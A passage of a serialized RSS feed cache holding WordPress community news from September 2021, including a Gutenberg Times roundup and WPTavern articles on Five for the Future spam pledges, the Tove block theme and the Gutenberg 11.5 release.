perspective. It guides you through a very basic theme switching process and then asks you to creatively think about what you’d like to see happen. Doesn&#8217;t this sound like great fun? You can influence the next phase of full-site editing and the future of WordPress themes standards. </p>\n\n\n\n<hr class=\"wp-block-separator is-style-wide\" />\n\n\n\n<p>Speaking of Exploration: <strong><a href=\"https://twitter.com/javier\">Javier Arce</a></strong> presents in his post <strong><a href=\"https://javierarce.blog/2021/09/14/interaction-of-color/\">Interaction with Colors</a></strong> an exploration of the Color panel and Color picker and a proposal for their improvement. In their current implementation they for instance don&#8217;t seem to scale well, take a lot of screen real estate. Arce is part of WordPress design team and works on the Inspector Controls for the Global Styles sponsored by Automattic. </p>\n\n\n\n<h2>Gutenberg for content creators and site implementers</h2>\n\n\n\n<p><a href=\"https://twitter.com/HughRoberts05\"><strong>Hugh W. Roberts</strong> </a>used a great example for his post on how reusable block can help you with your content creation and save some time in the process. In his post <a href=\"https://hughsviewsandnews.com/2021/09/13/how-to-create-and-use-a-reusable-block-for-your-book-on-wordpress/comment-page-1/#comment-123800\"><strong>&#8220;How to Create And Use A Reusable Block For Your Book On WordPress&#8221; </strong></a>&#8211; step by step &#8211; you learn how to create, Reusable blocks, place them into your post and amended them over all instances, when things change. </p>\n\n\n\n<hr class=\"wp-block-separator is-style-wide\" />\n\n\n\n<p><strong>Andres Noren</strong> has been working on a new theme for full-site editing. <strong>Justin Tadlock </strong>spotted it in the Theme Review queue and tested it for the WPTavern: <a href=\"https://wptavern.com/tove-a-block-based-wordpress-theme-by-anders-noren\"><strong>Tove: A Block-Based WordPress Theme</strong></a></p>\n\n\n\n<hr class=\"wp-block-separator is-style-wide\" />\n\n\n\n<h2>Block editor for developers</h2>\n\n\n\n<p><strong><a href=\"https://twitter.com/polevaultweb\">Iain Paulson</a></strong> wrote the Ultimate Overview of the <a href=\"https://deliciousbrains.com/wordpress-gutenberg/\"><strong>WordPress Block Editor for Developers</strong></a> in 2021 for Delicious Brains. </p>\n\n\n\n<p><em>Delicious Brains</em> recently acquired plugin <a href=\"https://www.advancedcustomfields.com/\">Advanced Custom Fields</a> has passed the 2-Million active installations&#8217; threshold! Congratulations! Through the grapevine, I learned that Delicious Brains is also taking over also <a href=\"https://wordpress.org/plugins/acf-blocks/\">ACF Blocks plugin</a> from Extendify. <strong>Munir Kamal</strong> is the original author of the plugin and then <a href=\"https://wptavern.com/extendify-acquires-editor-plus-introduces-commercial-templates-in-its-plan-to-improve-block-editing\">joined Extendify back in March.</a></p>\n\n\n\n\n<p><strong><a href=\"https://gutenbergtimes.com/need-a-zip-from-master/\">Need a plugin .zip from Gutenberg&#8217;s main (trunk) branch?</a></strong><br />Gutenberg Times provides daily build for testing and review. <br />Have you been using it? Hit reply and let me know.</p>\n\n\n\n<p><img alt=\"GitHub all releases\" src=\"https://img.shields.io/github/downloads/bph/gutenberg/total\" /></p>\n\n\n\n\n<p>The team at <a href=\"https://webdevstudios.com/\">WebDevStudios</a> also build some <a href=\"https://github.com/WebDevStudios/wds-acf-blocks\"><strong>Blocks for ACF. </strong></a> Among other blocks, that could also be Block Patterns, the plugin provides an Accordion block and a Carousel Block for which the data is managed through Advanced Custom Fields. Have a look at <a href=\"https://github.com/WebDevStudios/wds-acf-blocks/wiki/WDS-ACF-Blocks\">the Wiki for documentation</a>.</p>\n\n\n\n<hr class=\"wp-block-separator is-style-wide\" />\n\n\n\n<p>If you are interested in Headless WordPress and Gutenberg, <strong><a href=\"https://wptavern.com/wp-engine-launches-faust-js-a-new-headless-wordpress-framework\">WP Engine Launches Faust.js, a New Headless WordPress Framework</a></strong> for a NodeJS hosting environment. While Frontity builds on top of the mainly client-side ReactJS framework, Faust is built in top of NextJS, server-side ReactJS. <strong>Sarah Gooding </strong>provides us with the details. </p>\n\n\n\n<p>You don&#8217;t have to host with WPEngine to use this framework. It&#8217;s open-source and <a href=\"https://github.com/wpengine/faustjs\">available via GitHub</a>. The repository has gathered at the time of this post over 400 stars and 43 forks.  Faust.js is in the early stages of development. </p>\n\n\n\n<p>From the <a href=\"https://github.com/wpengine/faustjs/projects/1\">project board for the roadmap</a>, we learn that the Data Fetching process is considered done, and Authentication handling is being worked on. The team still discusses a Gutenberg Bridge and Gatsby support, yet another front-end framework build on top of ReactJS  </p>\n\n\n\n<p><strong><a href=\"https://twitter.com/KellenMace\">Kellen Mace</a></strong>, developer advocate at WPEngine, published some additional details on how Gutenberg and WPGraphQL can fit together: </p>\n\n\n\n<ul><li><a href=\"https://developers.wpengine.com/blog/gutenberg-in-headless-wordpress-render-blocks-as-html\"><strong>Gutenberg in Headless WordPress: Render Blocks as HTML</strong></a></li><li><a href=\"https://developers.wpengine.com/blog/gutenberg-in-headless-wordpress-wpgraphql-gutenberg\"><strong>Gutenberg in Headless WordPress: WPGraphQL Gutenberg</strong></a></li></ul>\n\n\n\n<hr class=\"wp-block-separator is-style-wide\" />\n\n\n\n<h2>WordPress Events</h2>\n\n\n\n<p><a href=\"https://2021.wpcampus.org/schedule\"><strong>WPCampus</strong></a>, a two-day virtual conference in the Higher Ed space, starts Tuesday, September 21. <a href=\"https://2021.wpcampus.org/schedule\">Here is the schedule.</a> There are quite a few Gutenberg related presentation, so it&#8217;s worth getting your free ticket. </p>\n\n\n\n<ul><li><a href=\"https://2021.wpcampus.org/schedule/making-gutenberg-viable-with-real-world-strategies\">Making Gutenberg viable with real world strategies</a> with <a href=\"https://twitter.com/JanoWebdev\">Jesse Janowiak</a></li><li><a href=\"https://2021.wpcampus.org/schedule/dynamic-blocks-ftw-customize-gutenberg-without-living-in-fear-of-validation-errors\">Dynamic blocks FTW!: Customize Gutenberg without living in fear of validation errors</a> with <a href=\"https://twitter.com/jonihalabi\">Joni Halabi</a></li><li>Panel Discussion: <a href=\"https://2021.wpcampus.org/schedule/what-ive-learned-from-using-gutenberg\">What I&#8217;ve learned from using Gutenberg</a> </li><li><a href=\"https://2021.wpcampus.org/schedule/overview-of-full-site-editing\">Overview of Full Site Editing</a> with Anne McCarthy</li></ul>\n\n\n\n<hr class=\"wp-block-separator is-style-wide\" />\n\n\n\n<p><a href=\"https://woosesh.com/\"><strong>WooSesh 2021</strong> </a>is scheduled for <strong>October  12-15, 2021</strong>. It&#8217;s a live, virtual conference for WooCommerce store builders organized by Brian Richards. </p>\n\n\n\n<hr class=\"wp-block-separator is-style-wide\" />\n\n\n\n<p><strong><a href=\"https://pagebuildersummit.com/\">Page Builder Summit</a></strong> is coming back and will be happening <strong>October 18 &#8211; 22, 2021. </strong>Nathan Wrigley and Anchen Le Roux are at it again! Sign-up for the VIP list and learn first about the details of the event. </p>\n\n\n\n\n<hr class=\"wp-block-separator is-style-wide\" />\n\n\n\n<p class=\"has-text-align-center\"><strong>Don&#8217;t want to miss the next Weekend Edition? </strong></p>\n\n\n\n<form class=\"wp-block-newsletterglue-form ngl-form ngl-portrait\" action=\"https://gutenbergtimes.com/feed/\" method=\"post\"><div class=\"ngl-form-container\"><div class=\"ngl-form-field\"><label class=\"ngl-form-label\" for=\"ngl_email\">Type in your Email address to subscribe.</label><div class=\"ngl-form-input\"><input type=\"email\" class=\"ngl-form-input-text\" name=\"ngl_email\" id=\"ngl_email\" /></div></div><button class=\"ngl-form-button\">Subscribe</button><p class=\"ngl-form-text\">We hate spam, too and won&#8217;t give your email address to anyone except Mailchimp to send out our Weekend Edition</p></div><div class=\"ngl-message-overlay\"><div class=\"ngl-message-svg-wrap\"></div><div class=\"ngl-message-overlay-text\">Thanks for subscribing.</div></div><input type=\"hidden\" name=\"ngl_list_id\" id=\"ngl_list_id\" value=\"26f81bd8ae\" /><input type=\"hidden\" name=\"ngl_double_optin\" id=\"ngl_double_optin\" value=\"yes\" /></form>\n\n\n\n<hr class=\"wp-block-separator is-style-wide\" />\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:7:\"pubDate\";a:1:{i:0;a:5:{s:4:\"data\";s:31:\"Sat, 18 Sep 2021 09:45:07 +0000\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}s:32:\"http://purl.org/dc/elements/1.1/\";a:1:{s:7:\"creator\";a:1:{i:0;a:5:{s:4:\"data\";s:18:\"Birgit Pauli-Haack\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}}}i:5;a:6:{s:4:\"data\";s:13:\"\n	\n	\n	\n	\n	\n	\n\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";s:5:\"child\";a:2:{s:0:\"\";a:5:{s:5:\"title\";a:1:{i:0;a:5:{s:4:\"data\";s:94:\"WPTavern: WordPress Contributor Teams Seek to Curb Spam Pledges in Five for the Future Program\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"guid\";a:1:{i:0;a:5:{s:4:\"data\";s:30:\"https://wptavern.com/?p=122800\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"link\";a:1:{i:0;a:5:{s:4:\"data\";s:233:\"https://wptavern.com/wordpress-contributor-teams-seek-to-curb-spam-pledges-in-five-for-the-future-program?utm_source=rss&utm_medium=rss&utm_campaign=wordpress-contributor-teams-seek-to-curb-spam-pledges-in-five-for-the-future-program\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:11:\"description\";a:1:{i:0;a:5:{s:4:\"data\";s:3919:\"<p>The <a href=\"https://wordpress.org/five-for-the-future/\">Five for the Future</a> program, an initiative Matt Mullenweg proposed in 2014, may soon be addressing the problem of spam and outdated pledges that appear on the program&rsquo;s dedicated website. The idea behind the program is that organizations and individuals will contribute five percent of their resources back to WordPress development, ensuring the future of the project.</p>\n\n\n\n<p>Five for the Future launched a website in 2019 to display pledges and has always relied on the honor system of self-reporting tools for individual and organizational pledges. In a discussion <a href=\"https://make.wordpress.org/project/2021/09/10/suggested-iterations-for-the-five-for-the-future-program-and-tool/#comment-24\">post</a> suggesting iterations on the project, Andrea Middleton identified two major issues with the program&rsquo;s current implementation that she said &ldquo;have kept it from reaching its full potential:&rdquo;</p>\n\n\n\n<ul><li>Spam or dormant pledges</li><li>Disconnect between contributor teams and pledged contributors</li></ul>\n\n\n\n<p>&ldquo;Two years later, there have certainly been more &lsquo;spam&rsquo; pledges than anyone would want, and surprisingly (to me) few reports of fake or spam pledges,&rdquo; Middleton said. &ldquo;What that tells me = either people don&rsquo;t go surfing around in the pledge lists, checking for accuracy, the Report feature is too hard to find (unlikely), or people don&rsquo;t really care whether pledges are accurate or not.&rdquo;</p>\n\n\n\n<p>Middleton said the existence of spam pledges diminishes the value of active pledges, which necessitates disclaimers on the site if it is to continue without a regular spam cleanup. She suggests starting bi-annual or annual spam checks mediated by contributor team leaders, who would report if they have ever worked with or seen participation from a specific list of pledged individuals. WordPress.org could send absent contributors an email prompting them to re-confirm their pledges are not spam.</p>\n\n\n\n<p>Ian Dunn, a full-time contributor to WordPress, suggested automating the effort to combat spam and dormant pledges.</p>\n\n\n\n<p>&ldquo;I think it&rsquo;d be best to tackle this first, because it won&rsquo;t matter how good our recruiting docs are if team reps have to dig through hundreds of inaccurate pledges in order to find the 5% of them that will contribute,&rdquo; Dunn said.</p>\n\n\n\n<p>&ldquo;I worry that a manual approach would add too much work for team reps, and wouldn&rsquo;t be done consistently, especially after the first 6-12 months.&rdquo;</p>\n\n\n\n<p>He suggests sending all people who are pledged regular emails for re-confirming their commitment, automating props wherever possible, and removing pledges after 6 months of no activity. Contribution tracking isn&rsquo;t as straightforward for things like Community team efforts but there may be some innovative solutions for these types of contributions.</p>\n\n\n\n<p>&ldquo;As a&nbsp;team rep, I&rsquo;d love a way to call in contributors that have pledged to the team,&rdquo; Courtney Engle Robertson said. Robertson contributes 20 hours per week to the Documentation, Marketing, Test, and Training teams. &ldquo;I&rsquo;d like them filtered a bit based upon team roles matched with what folks say they are interested in helping with. They could opt out if they need to change their commitments.&rdquo; This suggestion would help address Middleton&rsquo;s concern about the disconnect between contributor teams and pledged contributors.</p>\n\n\n\n<p>The discussion has been active for a week and is still in the the idea sharing stage. If you have any feedback on the ideas proposed or new ones to contribute, jump in on the comments of the <a href=\"https://make.wordpress.org/project/2021/09/10/suggested-iterations-for-the-five-for-the-future-program-and-tool/#comment-24\">post</a>. </p>\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:7:\"pubDate\";a:1:{i:0;a:5:{s:4:\"data\";s:31:\"Sat, 18 Sep 2021 02:11:26 +0000\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}s:32:\"http://purl.org/dc/elements/1.1/\";a:1:{s:7:\"creator\";a:1:{i:0;a:5:{s:4:\"data\";s:13:\"Sarah Gooding\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}}}i:6;a:6:{s:4:\"data\";s:13:\"\n	\n	\n	\n	\n	\n	\n\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";s:5:\"child\";a:2:{s:0:\"\";a:5:{s:5:\"title\";a:1:{i:0;a:5:{s:4:\"data\";s:62:\"WPTavern: Tove: A Block-Based WordPress Theme by Anders Norén\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"guid\";a:1:{i:0;a:5:{s:4:\"data\";s:30:\"https://wptavern.com/?p=122962\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"link\";a:1:{i:0;a:5:{s:4:\"data\";s:165:\"https://wptavern.com/tove-a-block-based-wordpress-theme-by-anders-noren?utm_source=rss&utm_medium=rss&utm_campaign=tove-a-block-based-wordpress-theme-by-anders-noren\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:11:\"description\";a:1:{i:0;a:5:{s:4:\"data\";s:4527:\"<p class=\"has-drop-cap\">I have been secretly keeping tabs on Anders Nor&eacute;n over the past couple of weeks, awaiting the moment he pushed his first block theme to the WordPress directory. I first noticed it when he <a href=\"https://twitter.com/andersnoren/status/1433779833176268806\">tweeted a screenshot</a> two weeks ago. And, today was the day it happened. <a href=\"https://andersnoren.se/teman/tove-wordpress-theme/\">Tove</a> landed in the review portal several hours ago, and I have been tinkering with it ever since.</p>\n\n\n\n<p>While it is not downloadable from the directory yet, the review system moves much faster than in times past. It should be available soon. In the meantime, anyone who wants to give it a spin can grab the ZIP file <a href=\"https://themes.trac.wordpress.org/ticket/105802\">from its ticket</a>.</p>\n\n\n\n<p>I called his last WordPress theme, <a href=\"https://wptavern.com/compatibility-is-not-enough-the-eksell-wordpress-theme-creates-art-with-blocks\">Eksell</a>, &ldquo;the standard by which we should be judging all other&rdquo; themes, and Nor&eacute;n has a history of releasing solid designs. Could he do for blocks what he has done for classic in years past?</p>\n\n\n\n<p>The truth is that going 100% blocks has limitations. Designers can experiment and test out some new things, but the underlying system is not up to par with what is possible with traditional theming. However, some feats are much easier to accomplish. Much of it depends on the creator&rsquo;s goals and how well they work with the system instead of fighting it.</p>\n\n\n\n<p>At first glance, Tove was not any more impressive than most block themes I have installed and activated. It seemed pretty bare-bones, but I imagine this is what theming will look like far into the future. Many will be a wide-open canvas that allows users to build whatever type of site they want. Themes will primarily add personality.</p>\n\n\n\n<p>One area where they can and will shine is with custom block patterns. And Tove has over 40 of them.</p>\n\n\n\n<p>The theme is flexible enough for use with various sites, but its focus is on cafes and restaurants. Many of the patterns lean into this, such as custom menus, call-to-action-buttons, and more.</p>\n\n\n\n<ul><li class=\"blocks-gallery-item\"><img /></li><li class=\"blocks-gallery-item\"><img /></li><li class=\"blocks-gallery-item\"><img /></li><li class=\"blocks-gallery-item\"><img /></li></ul>\n\n\n\n<p>Patterns are these pre-built pieces of a design that users can mix and match to lay pages out how they want. This also opens up things for theme authors by not having to make any hardline choices on how something like the front page, for example, should look. The theme is offering some suggestions and the tools to put it together. But, ultimately, the end-user gets to decide how it all comes out.</p>\n\n\n\n<p>With Tove, I had my homepage built in just minutes, as shown in the following screenshot. All I would need to do is fill it in with custom content.</p>\n\n\n\n<img />\n\n\n\n<p>It felt empowering to simply mash up just a handful of the theme&rsquo;s 40+ patterns and create a layout that I was comfortable with. This is what theming should really be all about: handing the keys over to users and letting them take the wheel. The theme&rsquo;s job is just letting them drive in style.</p>\n\n\n\n<p>There are other things to love about Tove too. It has several custom user-selectable styles, such as horizontal separators for the Columns block. However, my favorite is the shaded style for adding a blue drop-shadow to several blocks.</p>\n\n\n\n<img />Shaded block style.\n\n\n\n<p>The theme is not for everybody. The color palette is a bit on the flashier side and will not fit all sites. Few designers could pull off Tove&rsquo;s scheme, which is why I think I love it so much. As Nor&eacute;n <a href=\"https://twitter.com/andersnoren/status/1438479224952836100\">said in another tweet</a>, it&rsquo;s &ldquo;like a plateful of macarons.&rdquo; Some can work with pretty much anything. The rest of us are just fans.</p>\n\n\n\n<p>I would not call Tove revolutionary, but it has no need to be. It is built on top of an experimental system that still has many kinks to work out. However, it is nice to see what one of the WordPress community&rsquo;s best designers can do with a limited toolset. Nor&eacute;n has definitely pushed the boundaries, which should elevate the block theme development space.</p>\n\n\n\n<p>I cannot wait until all the pieces of full site editing are in place, and we can open this thing up.</p>\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:7:\"pubDate\";a:1:{i:0;a:5:{s:4:\"data\";s:31:\"Sat, 18 Sep 2021 01:19:08 +0000\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}s:32:\"http://purl.org/dc/elements/1.1/\";a:1:{s:7:\"creator\";a:1:{i:0;a:5:{s:4:\"data\";s:14:\"Justin Tadlock\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}}}i:7;a:6:{s:4:\"data\";s:13:\"\n	\n	\n	\n	\n	\n	\n\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";s:5:\"child\";a:2:{s:0:\"\";a:5:{s:5:\"title\";a:1:{i:0;a:5:{s:4:\"data\";s:103:\"WPTavern: Gutenberg 11.5 Adds Widget Grouping, Iterates on the Block Gap Feature, and Updates Nav Menus\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"guid\";a:1:{i:0;a:5:{s:4:\"data\";s:30:\"https://wptavern.com/?p=122881\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"link\";a:1:{i:0;a:5:{s:4:\"data\";s:247:\"https://wptavern.com/gutenberg-11-5-adds-widget-grouping-iterates-on-the-block-gap-feature-and-updates-nav-menus?utm_source=rss&utm_medium=rss&utm_campaign=gutenberg-11-5-adds-widget-grouping-iterates-on-the-block-gap-feature-and-updates-nav-menus\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:11:\"description\";a:1:{i:0;a:5:{s:4:\"data\";s:9498:\"<p class=\"has-drop-cap\">Gutenberg 11.5 <a href=\"https://github.com/WordPress/gutenberg/releases/tag/v11.5.0\">landed earlier today</a>. It is a hefty release that includes extensive changes to the Navigation block, a new way for grouping widgets, and more block gap feature integration.</p>\n\n\n\n<p>I have had mixed reactions to the features that made it into the latest release. At some points, I thought to myself, <em>finally, this made it in</em>. At other moments, I rendered my best version of Jean-Luc Picard&rsquo;s famous facepalm. But, the wheel keeps turning, and the developers who put their time and effort into the project continue to improve it.</p>\n\n\n\n<p>One quick note is that everyone not running a theme that supports the block editor should check that their backend styles are not out of place. Gutenberg automatically <a href=\"https://github.com/WordPress/gutenberg/pull/34439\">outputs some default editor styles</a> if the user&rsquo;s active theme does not register its own or have a <code>theme.json</code> file present. This should be bundled in point release such as WordPress 5.8.2 so that users are not waiting for it until 5.9.</p>\n\n\n\n<h2>Navigation Block Changes</h2>\n\n\n\n<p class=\"has-drop-cap\">With nav menus still being a pain point in site editing, Gutenberg has added new levels of complexity. The Site Title and Site Logo blocks are <a href=\"https://github.com/WordPress/gutenberg/pull/33316\">allowed inside of the Navigation container</a>.</p>\n\n\n\n<p>As Joen Asmussen <a href=\"https://github.com/WordPress/gutenberg/issues/33278\">shared in the original ticket</a>, some complex layouts would benefit from allowing more inner elements within the Navigation block:</p>\n\n\n\n<ul><li class=\"blocks-gallery-item\"><img /></li><li class=\"blocks-gallery-item\"><img /></li><li class=\"blocks-gallery-item\"><img /></li><li class=\"blocks-gallery-item\"><img /></li><li class=\"blocks-gallery-item\"><img /></li></ul>Navigation block patterns.\n\n\n\n<p>This could open a world of layout possibilities for theme authors through custom patterns.</p>\n\n\n\n<p>I have no issue with Gutenberg tackling the foundation for these more advanced layouts. However, we have yet to smooth out the basics of navigation. The experience of searching for and inserting in-site links is lackluster at best, requiring multiple mouse clicks. There is an open ticket for a <a href=\"https://github.com/WordPress/gutenberg/issues/34041\">lighter navigation experience</a>, and that should be the focus.</p>\n\n\n\n<p>Theme authors should also note that the Navigation block now <a href=\"https://github.com/WordPress/gutenberg/pull/32367\">relies on the CSS <code>gap</code> property</a> for spacing instead of <code>margin</code>. I almost missed this since I customized this for my own projects months ago &mdash; <em>welcome to 2021, where we no longer need to rely on hacky margin solutions for simple spacing</em>. This change could impact existing theme designs.</p>\n\n\n\n<h2>FSE Admin Notice Limited to Themes Screen</h2>\n\n\n\n<img />The lone FSE theme admin notice.\n\n\n\n<p class=\"has-drop-cap\">There are plenty of gripes to be had with the Gutenberg plugin as its features are constantly in flux. However, the most annoying thing about running the plugin has been its persistent, non-dismissible admin notice when a user is running a block theme.</p>\n\n\n\n<p>In previous versions of the plugin, this notice has appeared on every screen in the backend. Now, it <a href=\"https://github.com/WordPress/gutenberg/pull/34353\">only appears on the Themes/Appearance page</a>.</p>\n\n\n\n<p>Over the past few months, I have kept the <a href=\"https://wptavern.com/toolbelt-tidies-wordpress-plugin-and-theme-admin-notifications\">Toolbelt plugin</a> by Ben Gillbanks active for the sole purpose of hiding this notice.</p>\n\n\n\n<p><em>Good riddance. Farewell.</em></p>\n\n\n\n<h2>Widget Group Block</h2>\n\n\n\n<img />Editing a Widget Group block title.\n\n\n\n<p class=\"has-drop-cap\">While I generally believe the Gutenberg plugin developers and core WordPress make good use of feedback, the block-based widgets system has been one area where the project has dropped the ball. As I have been repeating <a href=\"https://wptavern.com/addressing-the-theme-design-problem-with-gutenbergs-new-block-based-widgets-system\">since September 2020</a>, the feature was fundamentally broken. The goal was to allow end-users to add blocks in more places, but it was never compatible with classic theme markup and styles.</p>\n\n\n\n<p>I proposed using patterns, but the team went with a <a href=\"https://github.com/WordPress/gutenberg/pull/34484\">Widget Group block</a>. The end result is similar but not exactly the same. The good news is that it fixes what should have been a blocker for the feature landing in core.</p>\n\n\n\n<p>The better news is that this is <a href=\"https://github.com/WordPress/gutenberg/pull/34484#issuecomment-912228911\">likely to land in WordPress 5.8.2</a> instead of the 5.9 release later this year.</p>\n\n\n\n<p>I would not go as far as calling it a perfect solution. The experience does not make it immediately clear how to add a widget title. Users must first add a block. Once a block is added, they can then click on the heading/title placeholder that appears. Then, the UI switches to a field for typing the title.</p>\n\n\n\n<p>The following video shows how the Widget Group block works:</p>\n\n\n\n<div>\n<div class=\"wp-video\"><!--[if lt IE 9]><script>document.createElement(\'video\');</script><![endif]-->\n<a href=\"https://user-images.githubusercontent.com/612155/131783930-4d97b085-e91e-4d6a-b426-5537568dd7c0.mp4\">https://user-images.githubusercontent.com/612155/131783930-4d97b085-e91e-4d6a-b426-5537568dd7c0.mp4</a></div>\n</div>\n\n\n\n<p>I would rather have a bit of a janky experience than no solution at all. At least users now do not have to manually create widget wrappers. Some could even deactivate the <a href=\"https://wptavern.com/classic-widgets-plugin-disables-wordpress-5-8s-upcoming-block-based-widgets-system\">Classic Widgets</a> plugin if this issue was a holdup.</p>\n\n\n\n<h2>&ldquo;Row&rdquo; Group Variation and Flex Layouts</h2>\n\n\n\n<img />Adding a post meta (byline) section with the Row block variation.\n\n\n\n<p class=\"has-drop-cap\">To begin testing the new flex layout system introduced in <a href=\"https://wptavern.com/gutenberg-11-2-expands-color-support-for-search-and-pullquote-blocks-introduces-experimental-flex-layout-for-group-block\">Gutenberg 11.2</a>, the development team has added a <a href=\"https://github.com/WordPress/gutenberg/pull/34535\">variation on the Group block named Row</a>. This allows users to align inner blocks side by side instead of on top of each other in the default &ldquo;flow&rdquo; layout.</p>\n\n\n\n<p>There are tons of use cases for the feature. One of the primary scenarios for theme authors will be aligning post and comment metadata bocks next to each other. Previously, this required use of the Columns block or custom styles, neither of which are ideal.</p>\n\n\n\n<p>The experience is rough around the edges. I often found it hard to click in the right spot to edit a block, and the appender button did not always appear for adding new ones.</p>\n\n\n\n<p>The Social Icons block also <a href=\"https://github.com/WordPress/gutenberg/pull/34493\">uses the new flex layout</a>. However, there is currently no way to switch it to flow mode for vertical social links.</p>\n\n\n\n<h2>More Block Gap Integration</h2>\n\n\n\n<img />Gap between each Column block.\n\n\n\n<p class=\"has-drop-cap\">The Columns block now <a href=\"https://github.com/WordPress/gutenberg/pull/34456\">uses the gap feature</a> introduced in <a href=\"https://wptavern.com/gutenberg-11-4-overhauls-galleries-adds-axial-padding-for-buttons-and-lays-groundwork-for-global-spacing\">Gutenberg 11.4</a> for handling the spacing between individual Column blocks. There is no UI for end-users to control this yet, but it is likely to land in a future release as the feature evolves.</p>\n\n\n\n<p>Gutenberg 11.5 has now added a <a href=\"https://github.com/WordPress/gutenberg/pull/34570\">bottom margin to the post title</a> in the editor. For whatever reason, the development team has made a leap and assumed its current handling of the block gap feature needed this. It is a complex problem to solve. In the meantime, some users might see more whitespace than they are accustomed to between their title and content in the editor.</p>\n\n\n\n<img />Lots of extra spacing there.\n\n\n\n<p>Of course, this depends on the active theme, its support of the block gap feature, and its current styles.</p>\n\n\n\n<h2>Post Author Duotone Support</h2>\n\n\n\n<p class=\"has-drop-cap\">For something that was supposed to be destined for the scrap heap, the Post Author block now has some new life in the form of <a href=\"https://github.com/WordPress/gutenberg/pull/34408\">duotone filter support</a> for its avatar. It works the same as it does for other blocks, such as Image and Cover.</p>\n\n\n\n<p>The problem is that Post Author was punted from the last WordPress release because it was not ready yet. The block is a Frankenstein-<em>esque</em> mashup of the author&rsquo;s name, avatar, and description. These <a href=\"https://github.com/WordPress/gutenberg/issues/24952\">should be multiple blocks</a> that theme authors and users can arrange in unique layouts.</p>\n\n\n\n<p>While duotone support simply adds one extra line of code, it does not make sense to continue working on the block in its current form. I would love to see it as part of a separate Post Author Avatar block.</p>\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:7:\"pubDate\";a:1:{i:0;a:5:{s:4:\"data\";s:31:\"Fri, 17 Sep 2021 01:10:33 +0000\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}s:32:\"http://purl.org/dc/elements/1.1/\";a:1:{s:7:\"creator\";a:1:{i:0;a:5:{s:4:\"data\";s:14:\"Justin Tadlock\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}}}i:8;a:6:{s:4:\"data\";s:13:\"\n	\n	\n	\n	\n	\n	\n\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";s:5:\"child\";a:2:{s:0:\"\";a:5:{s:5:\"title\";a:1:{i:0;a:5:{s:4:\"data\";s:108:\"Post Status: Post Status Excerpt (No. 25) — Doing “The Right Thing” and MailChimp Acquisition 